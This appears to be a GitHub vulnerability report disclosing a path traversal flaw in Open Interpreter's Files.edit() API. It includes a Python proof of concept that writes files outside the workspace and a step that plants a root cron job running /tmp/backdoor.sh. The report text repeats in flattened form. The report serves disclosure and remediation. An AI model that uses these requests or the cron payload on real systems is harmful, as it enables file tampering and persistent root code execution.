Describe the bug
Open Interpreter contains a critical path traversal vulnerability in the Files.edit() API that allows arbitrary file write/edit operations to any location on the host system. The vulnerability exists in interpreter/core/computer/files/files.py:22 where user-controlled file paths are processed without proper validation, enabling attackers to escape the intended workspace directory using path traversal sequences (../).
Severity: HIGH (CVSS 8.1)
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
Impact: Arbitrary file write/edit, potential code execution, system file tampering
This vulnerability affects the HTTP API endpoint for file editing operations and can be exploited by authenticated users to:
- Write or modify files anywhere on the filesystem
- Overwrite system configuration files
- Upload malicious scripts to executable locations
- Corrupt application data
- Achieve privilege escalation through file manipulation
Reproduce
Step 1: Set up Open Interpreter with HTTP API enabled
# Install Open Interpreter
pip install open-interpreter
# Start the HTTP API server
interpreter --api
Step 2: Craft malicious API request with path traversal
import requests
# Malicious payload with path traversal sequence
payload = {
'path': '../../../tmp/open_interpreter_exploit.txt', # Escapes workspace
'content': 'SECURITY VULNERABILITY - Arbitrary file write successful'
}
# Send request to Files.edit endpoint
response = requests.post(
'http://localhost:8000/api/files/edit',
json=payload,
headers={'Authorization': 'Bearer <your_token>'}
)
print(f"Status: {response.status_code}")
print(f"Response: {response.json()}")Step 3: Verify arbitrary file write outside workspace
# Check if file was written outside intended workspace directory
cat /tmp/open_interpreter_exploit.txt
# Expected output:
# SECURITY VULNERABILITY - Arbitrary file write successful
Step 4: Demonstrate system file overwrite (HIGH RISK)
# WARNING: This demonstrates overwriting system files - DO NOT RUN IN PRODUCTION
payload = {
'path': '../../../etc/cron.d/malicious_job', # System cron directory
'content': '* * * * * root /tmp/backdoor.sh\n' # Malicious cron job
}
response = requests.post(
'http://localhost:8000/api/files/edit',
json=payload,
headers={'Authorization': 'Bearer <your_token>'}
)
# Result: Cron job created, executes backdoor every minuteExpected behavior
The Files.edit() API should:
- Validate all file paths before processing to ensure they remain within the designated workspace directory
- Reject path traversal sequences such as
../, ..\\, and absolute paths
- Normalize paths using
Path.resolve() and verify containment within workspace
- Raise security exceptions when path traversal attempts are detected
- Log security events for audit and monitoring purposes
Example of expected secure behavior:
# Request with path traversal
payload = {'path': '../../etc/passwd', 'content': 'malicious'}
# Expected response
{
"status": "error",
"message": "Path traversal detected: ../../etc/passwd",
"code": "SECURITY_VIOLATION"
}Screenshots
Vulnerable Code Location
# File: interpreter/core/computer/files/files.py:22
# Vulnerable implementation
def edit(self, path, content):
"""Edit or create a file at the specified path"""
# NO PATH VALIDATION - accepts any path including ../
file_path = Path(path)
file_path.parent.mkdir(parents=True, exist_ok=True)
file_path.write_text(content)
return {"status": "success", "path": str(file_path)}Proof of Concept Output
$ python exploit.py
Status: 200
Response: {'status': 'success', 'path': '/tmp/open_interpreter_exploit.txt'}
$ ls -la /tmp/open_interpreter_exploit.txt
-rw-r--r-- 1 user user 58 Apr 20 10:30 /tmp/open_interpreter_exploit.txt
$ cat /tmp/open_interpreter_exploit.txt
SECURITY VULNERABILITY - Arbitrary file write successfulOpen Interpreter version
0.4.2
Python version
3.9.18
Operating System name and version
Ubuntu 22.04 LTS, Windows 11
Additional context
No response
Describe the bug
Open Interpreter contains a critical path traversal vulnerability in the
Files.edit()API that allows arbitrary file write/edit operations to any location on the host system. The vulnerability exists ininterpreter/core/computer/files/files.py:22where user-controlled file paths are processed without proper validation, enabling attackers to escape the intended workspace directory using path traversal sequences (../).Severity: HIGH (CVSS 8.1)
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
Impact: Arbitrary file write/edit, potential code execution, system file tampering
This vulnerability affects the HTTP API endpoint for file editing operations and can be exploited by authenticated users to:
Reproduce
Step 1: Set up Open Interpreter with HTTP API enabled
Step 2: Craft malicious API request with path traversal
Step 3: Verify arbitrary file write outside workspace
Step 4: Demonstrate system file overwrite (HIGH RISK)
Expected behavior
The
Files.edit()API should:../,..\\, and absolute pathsPath.resolve()and verify containment within workspaceExample of expected secure behavior:
Screenshots
Vulnerable Code Location
Proof of Concept Output
$ python exploit.py Status: 200 Response: {'status': 'success', 'path': '/tmp/open_interpreter_exploit.txt'} $ ls -la /tmp/open_interpreter_exploit.txt -rw-r--r-- 1 user user 58 Apr 20 10:30 /tmp/open_interpreter_exploit.txt $ cat /tmp/open_interpreter_exploit.txt SECURITY VULNERABILITY - Arbitrary file write successfulOpen Interpreter version
0.4.2
Python version
3.9.18
Operating System name and version
Ubuntu 22.04 LTS, Windows 11
Additional context
No response